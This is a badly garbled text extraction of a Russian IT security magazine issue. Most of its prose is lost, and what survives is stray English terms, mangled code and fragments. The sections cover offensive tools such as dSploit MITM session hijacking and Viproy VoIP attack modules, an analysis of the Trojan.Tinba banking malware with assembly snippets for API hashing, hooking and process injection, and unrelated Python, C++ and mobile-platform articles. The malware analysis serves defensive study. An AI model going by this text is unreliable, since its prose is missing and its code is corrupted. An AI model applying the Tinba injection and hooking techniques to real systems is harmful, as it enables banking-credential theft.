IOCTL TOOL SUITE

BALBUZARD

dSploit Android-
Android. ,
!
:
Wi-Fi ;
;
NVD;
login-;
TCP- UDP-;
HTTPS/SSL (SSL Stripping + HTTPS
Redirection);
MITM Realtime Network Stats;
MITM Multi Protocol Password Sniffing;
MITM HTTP/HTTPS Session Hijacking;
MITM HTTP/HTTPS Hijacked Session File
Persistance;
MITM HTTP/HTTPS Realtime Manipulation.

IOCTL ,
.
DIBF Dynamic Ioctl Brute-Forcer (and fuzzers).
, .
-, IOCTL-, ,

. ,
, .
-, DIBF dumb:
pure random fuzzer;
sliding DWORD fuzzer;
asynchronous fuzzer.

Balbuzard ,
, IP-, URL, EXE-
.
: / , -,
hex- . ,
URL, IP-,
. , .
,
. ,
.
:
;
IP-,
email-, URL, EXE-,
,
;
Yara- ;
CSV-;
batch- /;
.

, :
DroidSheep, NetSpoof zAnti. RouterPWN ,
traceroute, ,
MITM ,
YouTube JavaScript. ARM Android 2.3
root- BusyBox.

.
,
. hex-

.

81

10 /189/ 2014

VIPROY

: Fatih Ozavci
: Windows/Linux
URL: www.viproy.com
Viproy Voip- ,

VoIP-.
SIP Skinny, IP
. , Viproy
.


Metasploit .

:
SIP Register;
SIP Invite;
SIP Message;
SIP Negotiate;
SIP Options;
SIP Subscribe;
SIP Enumerate;
SIP Brute Force;
SIP Trust Hacking;
SIP UDP Amplification DoS;
SIP Proxy Bounce;

: Joshua J.
Drake
: Linux
URL: https://github.
com/jduck/androidcluster-toolkit

Skinny Register;
Skinny Call;
Skinny Call Forward;
VOSS Call Forwarder
(September 2014);
VOSS Speed Dial Manipulator
(September 2014);
MITM Proxy TCP;
MITM Proxy UDP;

: Aidan
Marlin, Nikos Laleas
: Windows/
Linux
URL: https://github.
com/nccgroup/
memaddressanalysis

Cisco CDP Spoofer.


SIP Skinny.
VoIP Wars:
Attack of the Cisco Phones (goo.gl/
RTVWbd). Happy hacking Cisco :).

: Jeremy Long
: Windows/
Linux
URL: https://github.
com/jeremylong/
DependencyCheck

ANDROID

MEM ADDRESS ANALYZER


Android,
,

.
Android . , . ,
, USB
hub, .
.
Android Cluster Toolkit Android. ,
,
USB-. , .
Ruby. :
scan.rb
;
shell.rb shell ;
mdo ADB ,
;
mcmd shell-
,
;
mbb
BusyBox ;
mpull .


, :
X
();
Y ();
: ,
/;
,

.

:
- , . , , ,
. ,
, ,
, . -
. , , .
Dependency-Check ,
. Java- .NET-,
Node.js
JavaScript-.
OWASP A9 Using Components with Known
Vulnerabilities.

Android- .

, ,

, ASLR (Address
Space Layout Randomization).
Python Linux Windws.

, ,
.
, ASLR Windows, DLL
,
.

20
82

Malware

10 /189/ 2014


drobotun@xakep.ru

Trojan.Tinba

JRMurray76@shutterstock.com

10 /189/ 2014

83

20

, . ,
,

, .

. 1. Trojan.
Tinba Symante
. 2. Trojan.Tinba
VirusTotal
. 3.

Trojan.
Tinba

START


,
,
- 19 968 .

- .
,
Zeus Carber.

Trojan.Tinba, ,
- .

. 4.

Malware

84

10 /189/ 2014

API-
Trojan.Tinba , , ,
API-.
API- ( API kernel32.dll, ntdll.dll,
ws2_32.dll, wininet.dll nspr4.dll), ,
, . ,
-, ,
-, ,
,
API-.
kernel32.dll (
, ).

kernel32.dll ( , ).
kernel32.dll
PEB _ LDR
_ DATA, Process Environment Block (PEB):

;
PEB
mov esi, fs:30h]
mov esi, esi 0Ch]
;
PEB _ L
_
mov esi, esi 1Ch]
;
kernel32.dll
;
"32"
:
mov ecx, esi 8h]
mov edi, esi 20h]
mov esi, esi
;0320033
"32"
cmp dword ptr edi 0Ch , 0320033h
jne
B

ntdll.dll
_ et odule andle

Catchy32
:
vxheavens.com/dl/ple/
catchy32.zip

Trojan.Win32.Tinba Trend Micro:
www.csis.dk/downloads/
Tinba_White_Paper.pdf

kernel32.dll ,
, .

API GetModuleHandle, :

;
invokx
...

WWW

ebx , "ntdll"



I-

. 5.
API-,


. 6.
API ( ,

Microsoft,
API-)
. 7.
API-

10 /189/ 2014

...
;
invokx
...

ws_2_32.dll
_ et odule andle

85

20


R
I

I
I



R

ebx , "ws2_32"

, ,
. kernel32.dll
28 API-, ntdll.dll ,
ws_2_32.dll .

25 ( CRC-32 ):

;
mov edi, lp llBase ddr
...
...
;
xor edx, edx
:
mov eax, 7
mul edx
mov edx, eax
mov x eax, byte ptr edi
add edx, eax
inc edi
;
cmp byte ptr edi , 0
jn
B
...

INFO

PI

API-
API, Trojan.
Tinba . -, HTTP-
- , ,
. -,
.

JMP ( 0E9h) ,
, , -, .

Microsoft, API (0x88, 0xff, 0x55, 0x88, 0xec),
,
Catchy32 ( ,
, ).
Catchy32
( 580 ). ESI EAX .
:

...
;
:
add
call
...
...
;
add
;
add
;
;
cmp
jb
...


(
,
,

).

-

:).

WARNING


. ,

,
.
. 8.


32 PAGE _ READWRITE
API- VirtualProtect,
. ,
JMP .


Trojan.Tinba Winsock API, RC4.
2 ( XOR).
XOR,
. :

;
mov edi, lp eyTable
;
,
mov esi, lp ata
...
...
: inc bl
...
...
mov cl, edi
ecx
;XO
xor
esi , cl
inc esi
dec n ata
jn
B

Catchy32
mov eax, ebx
eax, c_Catchy
eax

esi, eax
ecx, eax
5,
ecx, 5
B

86

Malware

10 /189/ 2014

, , GetBaseDelta
ebx, API : invokx <
API-> [ebx], < API>.
, GetBaseDelta invokx ,
. , , - ebx ( ,
):

etBase elta macro reg


local
delta
call delta
delta:
pop reg
sub reg, delta
endm

,
. ( , IP,
URL, , ).
, , , , -

( XOR
).
API- ws2_32.dll:

;
IP
invokx _inet_addr ebx , s ostName ebx
jmpns eax, F
;
U L
invokx _gethostbyname ebx , s ostName ebx
...
...
;
: mov clntSrvc.sin_addr, eax
mov clntSrvc.sin_port, 5000h
mov clntSrvc.sin_family, F_INET
invokx _socket ebx , F_INET, SOC _ST E , 0
;
invokx _connect ebx , hSocket, clntSrvc,
si eof clntSrvc
...
...
;
invokx _send ebx , hSocket, lpContents,
dwContentsLen, 0
...
...
;
invokx _recv ebx , hSocket,
e Buff, 320, 0
...

. 9.
POST-

API- ebx ( ).
firefox.exe, chrome.exe, iexplore.exe .
API RtlAdjustPrivilege
SE _ DEBUG _ PRIVILEGE,
CreateToolhelp32Snapshot, Process32First Process32Next
,
OpenProcess, WriteProcessMemory CreateRemoteThread.

10


,
-,
.

11

10 /189/ 2014

87

20

12

), , ,
.
Internet Explorer - HttpQueryInfoA, HttpSendRequest,
HttpSendRequestEx, HttpEndRequest, InternetCloseHandle,
InternetQueryDataAvailable, InternetReadFile, InternetReadFileEx
InternetWriteFile wininet.dll, Firefox
PR _ Read, PR _ Write PR _ Close nspr4.dll.
( Internet Explorer, Firefox) , API .
, .
Chrome , chrome.dll.
, , . chrome.dll
.
, ,
,
HTTP-, HTTPS, .

13

END
-
,
, . API FindFirstFile, FindNextFile ZwQueryDirectoryFile.

ZwQuerySystemInformation. RegEnumValue ZwEnumerateValueKey.
ZwQuerySystemInformation ,
SYSTEM _ INFORMATION _ CLASS.
SystemProcessInformation, , .

- -
Trojan.Tinba -,
(Carber, Zeus, Gataka
). - INJECTS.TXT.
Carber Zeus. ,
( POST-, GET-

. 10.

. 11.
ZwQueryDirectoryFile
. 12. Trojan.Tinba


Trojan.Tinba (
, API- ,
- ),

.
.

. 13.
API Internet Explorer
Firefox
. 14. API

Chrome


,
Head of Vulnerability Research Group,
Kaspersky Lab

14

, , . 710
, Pinch,
C++. :
, , , . , ,
:). C++
, , C#,
VB.
- .
,
. ,
, Radmin.
, .
, ,
.
, , .

Malware

88

10 /189/ 2014

-:
D

X-Shar
X-Shar@ru-sphere.ru

, ,
. ,
, XXI :
MD5-. ,
,
. ?
!


:
( ), ,
. , .
,
(on demand).
:
1. (164, 932, 3022 ),
() , -
( ) ,
. ,
, .
2.
,
? , ,


.
, .

(. ),
.

best pixels@shutterstock.com

10 /189/ 2014

89

][-: on demand

.
, :
. :
///
. VirusTotal
,
30 , ( , );
, , ,

. ,
:
virlist.dwb,
( ) .
, . ,
.
adware, 40 50 (
VT). , , , ,
. :
-
( ) ,

, , -
.
, , , adware VT
30 ().
: . ,
,
(MIRC, , ),
, .
!
3. (Avira, Bitdefender)
Kazy.
: 50 , 40
.
4. ,
.
,
, .
, , .



on demand ,
,
, bash-, MD5 .

:
1. ,

( ? :)),
,
- ,
.
.
2.

MD5? , ,
( ,
MD5-).

(
),
!
,
,
.

,
MD5 , ,
,
,
( , ),
(

,
).
,
. ,
,
, ,
, ,
.
,
.
PE- DOS-,
,
.

,
That
program cannot... .
( ).
3. ,
/ , ,
,
( ).
, , 99% , 50%
?

, .

PE.
, adware, , ,

.

, .
,
( ) 1%

.
(),
:
30% HEUR:Trojan.Win32
15% Trojan.Win32
12% Backdoor.Win32
7% Trojan-Downloader.Win32
6% Packed.Win32
5% Trojan-Dropper.Win32
5% Trojan-Spy.Win32
.
: , , malware-
(,
), ( )
. - 100
VirusSign .



C ,

(
VT). (
AutoCad), ,
,

(
).

- (
),
. (
), . ,
( ), .

90

Malware

10 /189/ 2014

2. .
3. .


,
,
. 1.
, ?

:
. , ,
, - . , ?
. 2, , ,

.
Norton Nano: .
Nano
(
), Norton
/, 1% .
,
, .
,
Comodo .
, ,
,
? !
, , ,
. , ,

. , :
,
, .
, .

, ? --.
/
: , , ,
, , ...
, :
1. (keygen/crack).

. 1.
*
. 2.


. 3. :
*

,

.
,
. 3.

. ,
.

Hintau Aliaksei@shutterstock.com

92
10 /189/ 2014

10 /189/ 2014

93



PYTHON
.
, ,
, , . ,
,
. ,
, ,
Python,
. , ?


, , . , thread, stream, flow
. thread , , , stream flow, -
( data flow). , ,
.
, ,
. ,
, . ,
-. -,
stdin, stdout stderr, ,
-.
, , - , ,
.
. - cat file.txt | sed s/foo/bar/g,
, stdout cat stdin sed.

Data Flow Programming. -
, -
. .
-, , stdin , , -

enchantner
, Mirantis Inc
@enchantner

, ,
, . C/C++, , .
(slidesha.
re/1rHhfm7).


Python.
, .
. Python (
) ,
, , iterator iterable.
, , , .
, ,
- for,
__iter__() next() (
Python __next__()). , list , list , . listiterator,
iter() , ,
for map().
, StopIteration.
, ,
, Python 2,
Python 3. six (bit.ly/1lfBzXR).

from __future__ import print_function


Six
,
,
next,
__next__()
from six import Iterator
class yIterator(Iterator):
def __init__(self, step=5):
self.step = step
def __iter__(self):
return self
def __next__(self):
self.step -= 1
,
if not self.step:
raise StopIteration()
return self.step
myiterator = yIterator()
for item in myiterator:
print(item, end=" ")
print()
"""
4 3 2 1
"""

94

, . MyIterator
(, ) , .
- , - for ( ).


, , ,
?
, , , -,
list comprehensions.

with open("file.txt", "r") as f:


mylist = l for l in f if "foo" in l]
for item in mylist:
print(item)
"""
file.txt
,
"foo"
"""
. (
,
), , , ,
. . ,
. , ,
( "foo" , , ).
,
, array? ,
( ) ,

,
O(n). ? , . ?

with open("file.txt", "r") as f:


mylist = (l for l in f if "foo" in l)
for item in mylist:
print(item)
"""
file.txt
,
"foo"
"""

10 /189/ 2014

Python, , .
, ,
, asyncio, Python 3.
( ):
www.dabeaz.com/generators-uk/
www.dabeaz.com/coroutines/

, ,
.
,
, , - . -,

,
. , :

def my_generator(step=4):
with open("file.txt", "r") as f:
for l in f:
if "foo" in l:
yield l
myiterator = my_generator()
for item in myiterator:
print(item)
"""
(
)
txt
,
"foo"
"""

file.

yield
,
, . ,
,
yield.
, .

, ,
open source ,
,
. range() xrange() Python 2
, ,
, .

def my_generator2(step=4):
print("First block")
yield 1
print("Second block")
yield 2
myiterator = my_generator2()
myiterator.next()
# "First block"
myiterator.next()
# "Second block"
myiterator.next()
Traceback: StopIteration

YIELD


? ,
Python, , ( ).
...
, , ,
. , , .

(, Python
"return a, b", . ). ,
, , ?
, , , , -

, , .
? next() ,
? , .
Python 2.5 : .close(), .throw() .send().
, , Data Flow
Programming.
.close() , .throw() :

from __future__ import print_function


import itertools
def my_generator3():
counter = itertools.count()
while True:

95

10 /189/ 2014

, . , yield (,
, return) . , flow
(, ).
,
MapReduce,
. ,

, Linux,
.

yield next(counter)
myiterator = my_generator3()
myiterator2 = my_generator3()
for item in myiterator:
print(item, end=" ")
if item == 3:
myiterator.close()
print()
for item in myiterator2:
print(item, end=" ")
if item == 2:
myiterator2.throw(Exception("


"))

print()
"""
0 1 2 3
0 1 2 Traceback (most recent call last):
File "test.py", line 28, in <module>
myiterator2.throw(Exception("
"))
File "test.py", line 12, in my_generator3
yield next(counter)
Exception:
"""
, , .send().

!

from __future__ import print_function


import itertools
def my_coroutine():
counter = itertools.count()
while True:
y = (yield next(counter))
if y:
counter = itertools.count(y)
myiterator = my_coroutine()
for item in myiterator:
print(item, end=" ")
if item == 1:
myiterator.send(4)
elif item == 6:
myiterator.close()
print()

, , .
,
,
.

: , , .
, Python , ,
, ,
.
(. ). , Apache:

23.34.139.80 - ...
" ET /categories/ TTP/1.1" 200 6394
23.34.139.80 - ...
" ET /favicon.ico TTP/1.1" 404 80
23.34.139.80 - ...
" ET /static/img/logo.gif TTP/1.1" 200 41526
23.34.139.80 - ...
" ET /news/story.html TTP/1.1" 200 6223
23.34.139.80 - ...
" ET /about/example.html TTP/1.1" 200 1223
42. .100.21 - ...
" ET /index.html TTP/1.1" 200
4
,
. , , .
.

"""
0 1 5 6
"""

wwwlog = open("access-log")
bytecolumn = (line.rsplit(None,1) 1]
for line in wwwlog)
bytes = (int(x) for x in bytecolumn if x
print "Total", sum(bytes)

coroutine. , , ,
,
gevent, tornado eventlet. , , , ,
Python

, ,
? - - ,
, .

= '-')


itertools
(https://docs.python.org/3/library/itertools.html), ,
,
.
Python
Module of the Week (Doug Hellmann):
pymotw.com/2/itertools/.
: , , : sahandsaba.com/pythoniterators-generators.html.

, ,
,
, ,
, ,
.


. Python , , ,
.
, . !

96

C++
10 /189/ 2014


NATIVE CLIENT

10 /189/ 2014

97

C++

. , Chrome .
, , -
. ,
,
:), .

deeonis
deeonis@gmail.com

VladisChern@shutterstock.com


.
JavaScript HTML 5 , C C++.
, -
.
Native Client
Google.

98

10 /189/ 2014

NATIVE CLIENT
NaCl
2008 . , ,
.
legacy NaCl. . , , , ,
,
Native
Client .
, , , . 2D- 3D-,
,
. , Google. , ,

.
, Google
. (!) ,

.
. -!
,
Windows, OS X , , Linux.
x86- ARM.
2011- NaCl Chrome. , ,
-.
ActiveX, ( IE), , , Native Client
BSD.
NaCl .

GameDev

NaCl



NaCl

NATIVE CLIENT
Native Client . ,
Google NaCl Quake. ,
, 1996 ,
, (
, , ) .

. , -
, : , , CPU
,
,
. ,

-,
.
, - .
,
personal data . ,
, .


Native Client ,
C++
. NaCl (, ) -,

API.
Portable Native Client (PNaCl).
, , .
. API,
, NaCl.

10 /189/ 2014

99

C++

API,
.
,
Native Client,
, , .
, NaCl-
. ,
.
C++ JavaScript . ,
, .

HELLO NACL
Native Client, - ... . Hello World, Hello NaCl.
Native Client SDK.
. . ,
Python 2.7 make.
SDK -, localhost.
:

$ cd pepper_$(VERSION)/getting_started
$ make serve

HelloTutorialModule.postMessage('hello');

Native Client

, . - HandleMessage
hello_tutorial.cc. TODO, , .

PostMessage, .

SDK ,
$(VERSION). -. PNaCl
31 . ,
SDK
Chrome.

NaCl-.
pepper_$(VERSION)/getting_started/part1 . index.html.
HTMLLayout JS- . ,
nmf, hello_tutorial.nmf. , HTML, NaCl- .
hello_tutorial.cc,
C++, Makefile.
:

virtual void HandleMessage(const pp::Var


& var_message) {
if (!var_message.is_string())
return;
std::string message = var_message.AsString();
pp::Var var_reply;
if (message == "hello") {
var_reply = pp::Var("hello from NaCl");
PostMessage(var_reply);
}
}
, ,
, - . Var
C++.
-
. ,
hello, ,
Var.
index.html NaCl. JS alert :

$ cd pepper_$(VERSION)/getting_started/part1
$ make
-,
SDK, URL:
http://localhost:5103/part1,
LOADING...
SUCCESS. , ?
Hello NaCl, . index.
html JavaScript- moduleDidLoad. ,
HTML-
,
. moduleDidLoad NaCl- hello_tutorial
SUCCESS,
/part1.
hello,
postMessage . :

function moduleDidLoad() {
HelloTutorialModule = document.
getElementById('hello_tutorial');
updateStatus('SUCCESS');
//
Native Client

function handleMessage(message_event) {
alert(message_event.data);
}

WWW

Native Client:
https://developer.
chrome.com/nativeclient
Native Client
SDK
:
https://developer.
chrome.com/nativeclient/sdk/download

, http://localhost:5103/
part1. message box hello from NaCl,
, .

. , ,
, Native Client .
Java,
,
ActiveX Microsoft. , Chrome
Native Client.

10 /189/ 2014

Ozgur Coskun@shutterstock.com

100

10 /189/ 2014


irairache@gmail.com

WINDOWS PHONE, BAIDU YI,


UBUNTU TOUCH, TIZEN, WEBOS,
FIREFOXOS

101

102

WARNING


IT-.

,
.

Google Play App Store


, . -,
, . ,
. ][
,
.

PHONEGAP
phonegap.com


-

HTML, CSS JS. :

INFO
2000-
Nokia
.

Symbian OS.


1999 2012 .

. ,
Symbian

EPOC,


1980-
.

10 /189/ 2014

iOS;
Android;
Windows Phone;
BlackBerry;
Bada;
Symbian;
WebOs;
Ubuntu Touch;
Tizen.

POSIX
Linux
Nokia X Platform;
Baidu Yi;
Ubuntu Touch;
Tizen;
WebOS;

Firefox OS;
Sailfish OS;
.;
MIUI.

QNX
BlackBerry 10.

WINDOWS

Windows Phone.

XNU
iOS.

NOKIA X PLATFORM

https://developer.nokia.com/nokia-x/platform-overview
Android Open Source
Project. ++ Java.
Nokia 2012 . Microsoft
Mobile ( ,

Windows Phone).
, ,
. Nokia X Platform
.
Android-,
Nokia (HERE Maps, MixRadio, Nokia Express)
Microsoft (utlook, ).

,
75% Android-
.
Nokia X Services SDK
Nokia API,
HERE Maps, Nokia Notifications
Nokia Payment. Nokia X Platform
Android.
Nokia Store.
(, ) Google Play.
Quality Assurance Review.

Developers checkpoints

Java
Nokia SDK
Nokia API
Nokia Store

10 /189/ 2014

INFO

Baidu.
,

,
. :
-,
,

.

103

BAIDU YI
rom.baidu.com

OC
Baidu.
Dell.
2011 .
Android . Google (, )
Baidu,

.
Baidu Yi
.

.
,
Google Translate.
, Baidu Yi . , .

Developers checkpoints


Baidu Yi SDK
Java
Baidu Yi App Store

UBUNTU TOUCH
UBUNTU.

UNITY

INFO

Canonical Ltd.


Open Source,
. ,





.

UBUNTU TOUCH
ubuntu.com

Canonical Ltd.
Ubuntu Touch 2
2013 . Ubuntu Touch

Ubuntu.
Unity
.
, Ubuntu Touch, :
Huawei Ascend P1, Meuzu MX3 Meizu
MX4. Android-,

CyanogenMod. : wiki.ubuntu.com/
Touch/Devices.

Ubuntu Touch:
HTML + CSS + JS;
Qt + QML.
(app) (Scope).

Developers checkpoints

Qt
QML
Ubuntu SDK
Ubuntu Store

104

10 /189/ 2014

TIZEN

INFO

www.tizen.org

Tizen

.

:
-
;

Tizen-;

;
;
,
;
;

.
,
irairache@gmail.com.

Tizen
Association. ( Huawei, Intel, Samsung,
Panasonic ),
2012 . 5
2012 . Limo.
, Tizen
Smart TV.
2014
Samsung Z.
Tizen Association : , , ,
. Tizen (HTML, CSS, JS) Java.

Developers checkpoints

Eclipse
Tizen SDK
GWT SDK
Tizen WEB API

Apache Ant
Java
Tizen Store

Google Play > 1,3


App Store > 1,2
Windows Phone Store > 300
BlackBerry App World > 230
Firefox Market Place > 4

Windows Phone Store Google


Play Android Market, .
2014- 300 , .
105 ( ).
Microsoft .

INFO

WEBOS

WebOS
Palm OS.

PalmGear (palmgear.
com),

50 .
Palm
OS
,
,


.

www.openwebosproject.org

Palm OS.
8
2009 . 2011 2013 HP. webOS
LG Electronics.
, Smart TV.

webOS SDK.
C++ ( OpenGL) HTML (, CSS JS).

App Catalog.

Developers
checkpoints

webOS SDK
++
OpenGL

INFO
. .
20 ,
, . ,
:).

105

10 /189/ 2014

BLACKBERRY 10

INFO

blackberry.com

BlackBerry ( Research in Motion).



. 2000 BlackBerry OS.
. ,
BlackBerry, ,
, .
C++ BlackBerry SDK.
BlackBerry OS Android apk2barVerifier apk2bar.
BlackBerry App
World
.
. , - , :
, Google Play , App World . - , .

BlackBerry
-. :
BlackBerry Porsche
Design P9982

20132014

(8 ,
2 ). ,


1700 .

Developers checkpoints

C++
BlackBerry Native SDK
BlackBerry App World

FIREFOX OS

mozilla.org/en-US/firefox/os/

Developers
checkpoints

HTML5
CSS
JavaScript
WebAPI
Firefox Browser
Firefox OS Simulator
Firefox Market Place

Mozilla
Foundation. 2 2013 .

: ZTE Open, Alcatel
One Touch Fire H, Huawei Y300II, Geeksphone Peek
. HTML5
Gecko.
, ,
-. Firefox Market Place.

, Firefox
OS . , Firefox OS -, Web API .

SAILFISH OS

Developers checkpoints

SailfishOS Alpha SDK


Qt

QML
Nokia X Store Yandex.Store

https://sailfishos.org

INFO

Jolla. , Nokia
- MeeGoo.
Sailfish OS 22 2012 .
20 2013-
. Jolla,
-. ,
Sailfish OS , Nokia N9.
Qt + QML Sailfish OS SDK ( OS X,
SDK ).
Sailfish OS
Android- ,
MeeGoo.
Sailfish Jolla SDK (
OS X, ),
Qt Sailfish Silica API.
Jolla Store (harbour.jolla.com).



Joll
: .

106

10 /189/ 2014

: .Shell , . Google.Maps, . Gmail


.

INFO

19 2014 Android.
, , ,
Huawei Honor 3 Yandex Explay Flame.
Android 4.2.2 (Jelly Bean).
: .Shell
, .
Google.Maps, . Gmail
.
. Android.
, ,
.
. (store.yandex.ru). -
Android (goo.gl/ffuE4U). .



, ,

.
:

. ,


2015
iPhone 6,
YotaPhone,
.. ,

. ;).

kit.yandex.ru

INFO



?.

:
,
,
.

.

Developers checkpoints

Eclipse
Android SDK

Java
Yandex.Store

REPLICANT

Developers
checkpoints

www.replicant.us

Android c
100%- . , ,
.
, , ,
CyanogenMode.
Replicant , Samsung Galaxy Nexus.
Replicant Google Play , Replicant
SDK. , , .

Eclipse
Replicant SDK
Java

MIUI

INFO

en.miui.com



,

Android,
Google.

INFO
,
MIUI,

, iPhone
(Foxconn).

Developers checkpoints

Java

Eclipse

Android SDK

Xiaomi Tech.
Android,
iOS. ,
,

.
.
(https://vk.com/miuisu),


Android.
Google Play
MIUI.

10 /189/ 2014

107

I R

Mail.Ru Group ,
. ,
, , ,
,
.
,
@corp.mail.ru. :)


lozovsky@glc.ru

, ,
Mail.Ru Group .
, (, , ICQ, ,
), (Hi-Tech, , ), (, , , ) , , (Russian Code Cup, Russian Design Cup, Russian
AI Cup, )
(Tarantool, centrifuge).
Mail.Ru Group ,
, .
!

MAIL.RU GROUP?
, :
, , . ICQ.
ICQ 6,7
( 11 )! ,
(ICQ Android). , , ICQ Android :
, , .
. , , ,
, -
!
, ,
. , .



ICQ Android

108

10 /189/ 2014

ICQ

,
Android, , .
. Android- .
, ( ) . , , , , ,
. , ...
, -,
ICQ
. ,

.
. : goo.gl/d79gts.
: !

,
. ,
.
,
: www.kaspersky.ru/crackme/crackers.

R D R

. (:
,
:))!

I -

- ,
,
.
lozovsky@glc.ru
. , , . ,
, ,
.

INFO

,


APK,


s.danilchenko@corp.
mail.ru.

10 /189/ 2014

109

,


, . ,
. - ,
(
, ) , -
, ,
,
...
. :)

ICQ, , , , ,
,
. . :
;
,
-, ;
,
.

ICQ .


. :
,
.
. ?
, ,

, ,
,


.



,
, .
, .
!

110

++

10 /189/ 2014

qua ,
++

qualab@gmail.com

10 /189/ 2014

111

SQL-
.
boost::variant. ,

RPC-. C++.
, API.
,

. !

,
,
C++, , ,
.
, , ,

. , C++.

C++
C++ ,
. , 90%
, . , , , .
, SQL ,
.
RPC-, , ,

API RPC-.
,
,
,
SQL-,
, - .

.



C++
. ,
, , , -.
. , :
. , .
:

class IGoods
{
public:
virtual std::string Name() const = 0;
virtual int TypeID() const = 0;
virtual float Price() const = 0;
};
, , , ,
Name, TypeID Price, , :

class Candies : public IGoods


{
public:
static const int TYPE_ID =
Candies(std::string const&
virtual std::string Name()
virtual int TypeID() const
virtual float Price() const
private:
std::string m_name;
float m_price;
};

9001;
name, float price);
const override { return m_name; }
override { return TYPE_ID; }
override { return m_price; }

,
, . ,
, , - , , ,
, .
:
,
; , ,
switch, - case- ;
, , -
, , ,
JSON- SQL-;
, -.
, , , , , , , C++, :
, , -,
;
: , . , ,
, ,
, std::shared_ptr std::unique_ptr.
, , ;
std::unique_ptr
Clone , , , std::shared_ptr, .

C++,

112

++

, .
,
:

std::deque<std::unique_ptr<IGoods>> goods;
std::unique_ptr<IGoods> result =
GoodsFactory::Create<Candies>();
goods.push_back(std::move(result));


.

std::deque<std::unique_ptr<IGoods>>
another(goods.size());
std::transform(goods.begin(),
goods.end(), another.begin(),
[](std::unique_ptr<IGoods>& element) {
return element->Clone();
}
);
C++, ,
,
.
C++
, ?

-?
-, .


.
C++.
, , ,
, !
,
, -,
, ? , .

,
Pimpl Double
dispatch

10 /189/ 2014

//
PI
class object
{
public:
object();
virtual ~object();
virtual bool is_null() const;
virtual std::string to_string() const;
protected:
//
class data;
private:
std::shared_ptr<data> m_data;
};
//
PI
//
include
class object::data
{
public:
data() { }
virtual ~data() { }
virtual bool is_null() const { return true; }
virtual std::string to_string() const { return "null"; }
};
//
PI
//
,
object
class flower : public object
{
public:
flower(std::string const& name);
virtual bool is_null() const override;
virtual std::string to_string() const override;
virtual std::string name() const;
virtual void rename(std::string const& name);
protected:
//
class data;
};
//
PI
//
include
class flower::data : public object::data
{
public:
static const std::string FLOWER_UNKNOWN;
data()
: m_name(FLOWER_UNKNOWN) {
}
data(std::string const& name)
: m_name(name) {
}
virtual bool is_null() const override { return false; }
virtual std::string to_string() const override {
return "flower: " + m_name;
}
virtual std::string name() const { return m_name; }
virtual void rename(std::string const& name) { m_name = name; }
private:
std::string m_name;
};
, , ,
. , .

object rose = flower("rose");


object none;
std::vector<object> garden;
garden.push_back(std::move(rose));
garden.push_back(std::move(none));
garden[1 = flower("gladiolus");
std::for_each(garden.begin(), garden.end(),
[](object const& element) {
std::cout << element.to_string() << std::endl;
}
);

10 /189/ 2014

113

C++ ,
operator -> .
const, non-const

API .
, .
object,
. , shoes:

class shoes
{
public:
shoes(long long price);
virtual bool is_null() const override;
virtual std::string to_string() const override;
virtual long long price() const;
virtual void discount(long long price);
protected:
class data;
};
shoes::data flower::data. , :

garden.push_back(shoes(100000000000LL));
, 100 .
, ,
. , , std::vector<flower>.
,
, ,
object.
C++ . ! . C++.


, Clone, .
.
, ,
. .
, copy-on-write (COW), C++ , Qt, COW ,
(QString),
.
:
;
const non-const,
, - ;

,
operator ->, , const non-const.
operator -> , ; operator -> , , .
, , .
,
, , .
, :

template <class data_type>


class copy_on_write
{
public:
copy_on_write(data_type* data)
: m_data(data) {
}
data_type const* operator -> () const {
return m_data.get();
}
data_type* operator -> ()
if ( m_data.uni ue())
m_data.reset(new
data_type(*m_data));
return m_data.get();
}
private:
std::shared_ptr<data_type> m_data;
};
-
,
, , , ,
COW C++. ,
.
, , object:

class object
{
...
protected:
class data;
private:
copy_on_write<data> m_data;
};
, ,
.
,
C++ ,
, , . -,
m_data->method(arguments), ,

, stack trace,


, .
, Pimpl Double dispatch
, .

114

++

10 /189/ 2014


, , , ,
SQL- .
, API , , ( ,
API,
).
,
, , , C++.
SQL-. Boost.Preprocessor object.

//
S L,
db::S l uery
db::S l uery uery("select * from users as u
where u.type = $(usertype)
and u.registered >= $(datetime)
limit 10");
//
operator ()
db::S l uery esult result = uery("admin", datetime::today());
//
std::for_each(result.begin(), result.end(),
(db::S l uery ow const row)
{
//
object login = row "login"];
if (login.is_null())
std::cout << "not specified";
else
std::cout << row "login"];
//
if (row "status"] == "deleted")
std::cout << " (deleted)";
std::cout << std::endl;
}
);
db::SqlQuery::operator() object, implicit object:

class object
{
public:
template <typename value_type>
object(value_type const& value);
...
};


object integer, boolean, floating, text, datetime ,
object .
, , ,
,
bool:

class boolean
{
public:
boolean(bool value)
: object(value) {
}
...
protected:
class data;
friend class object;
};
template<>
object::object(bool value)
: m_data(new boolean::data(value)) {
}
, , .
,
object , -
. ,
,
, , . object ,
.
, object
, . begin(), end(), size(), operator [] :

object result = query("admin", datetime::today());


std::for_each(result.begin(), result.end(),
[](object const row)
std::for_each(row.begin(), row.end(),
[](object const& cell) {
std::cout << cell.to_string() << ' ';
}
std::cout << std::endl;
}
);



, ,
Pimpl. :
. get_ set_
, . .

10 /189/ 2014

115



. , C++, C# Java
. , , ! ,
API-
( ).
.
, ,
, ,
, .
C++, ,
, .

, ,
object, . ,
, , , , !
,
, , , .
C++,
,
( ) copy-on-write.
, . : , ,
. ,
, . , API
, , ,
.

,
.


, , API C++
, RPC-
. ,
,
. ,

,
. copy-on-write
operator ->
const non-const ,
, , , . , ,
,
.
new .
, , . ,
, - , .
.
, Pimpl,
, .
API,
C++.
, , . ,
,
- .
API ,
. , ,
API, .

116

Unixoid

10 /189/ 2014

Fer Gregory@shutterstock.com


androidstreet.net


DROPBOX

10 /189/ 2014

117

118

Unixoid

10 /189/ 2014



, email, Twitter
. Dropbox, Google Drive
. ,
0 $ .
: , ,
-. , .
Seafile


, Dropbox. Linux,
, ,
-,
.
/
, (
).

, ,
, . OwnCloud Seafile. , Dropbox, . , .

, OwnCloud
.
OwnCloud
. PHP, , , .
Seafile, , ,
Python -
- , , .
RasPi
, (100
~5%
).
. OwnCloud ,
. ,
.
, OwnCloud -

INFO
Seafile
RasPi
.
,
Seafile
(goo.gl/a6hCjK).

FI

FI
I

.
Seafile ,
,
.
, Seafile ,
OwnCloud, .
Seafile , Git ( ),
.
,
, , , (, Git) .
.
Seafile Dropbox- ,
. ,
OwnCloud
, - , KDE -,
,

OwnCloud.

, Seafile? , -, ,
, . , Dropbox:
( ) , . ,

10 /189/ 2014

119

Seafile
Android

, memcached
Ceph Amazon S3. , ,

10 / ( ).
Seafile .
, . , . ,
. - (

INFO
Seafile ArchLinux,
libselinux AUR:
